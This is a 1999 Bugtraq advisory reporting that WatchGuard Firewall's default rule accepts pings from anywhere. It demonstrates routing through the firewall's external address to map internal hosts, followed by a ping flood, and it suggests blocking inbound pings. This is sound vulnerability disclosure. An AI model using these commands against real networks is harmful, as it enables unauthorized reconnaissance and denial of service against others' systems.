[11699] in bugtraq
Default configuration in WatchGuard Firewall
daemon@ATHENA.MIT.EDU (Alfonso Lazaro)
Sat Sep 4 13:12:23 1999
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Message-Id: <19990902131536.F21023@ip6seguridad.com>
Date: Thu, 2 Sep 1999 13:15:36 +0200
Reply-To: altellez@IP6SEGURIDAD.COM
From: Alfonso Lazaro <altellez@IP6SEGURIDAD.COM>
X-To: bugtraq <BUGTRAQ@SECURITYFOCUS.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
I have found a misconfiguration in the default configuration of Watchguard Firewall.
By default it appends a rule that it accepts pings from any to any.
So if our firebox is defending our internal network ( 192.168.x.x ... )
and our WG Firewall is a proxie with an external ip in internet ( 100.100.100.100 hipotetic ip address ) the atacker can change his/her routes like so :
# route add -net 192.168.0.0 netmask 255.255.255.0 gw 100.100.100.100
# ping 192.168.1.1
PING 192.168.1.1 (192.168.1.1): 56 data bytes
64 bytes from 192.168.1.1: icmp_seq=0 ttl=251 time=514.0 ms
^C
# ping 192.168.1.2
PING 192.168.1.2 (192.168.1.2): 56 data bytes
64 bytes from 192.168.1.2: icmp_seq=0 ttl=251 time=523.0 ms
^C
and so on ...
the atacker can now discovers internal network ip and atack them
# ping -f 192.168.1.1
Solution is easy ... do not let pings to internal network.
--
Saludos.
===========================================================
Alfonso Lazaro Tellez altellez@ip6seguridad.com
Analista de seguridad
IP6Seguridad http://www.ip6seguridad.com
Tfno: +34 91-3430245 C\Alberto Alcocer 5, 1 D
Fax: +34 91-3430294 Madrid ( SPAIN )
===========================================================
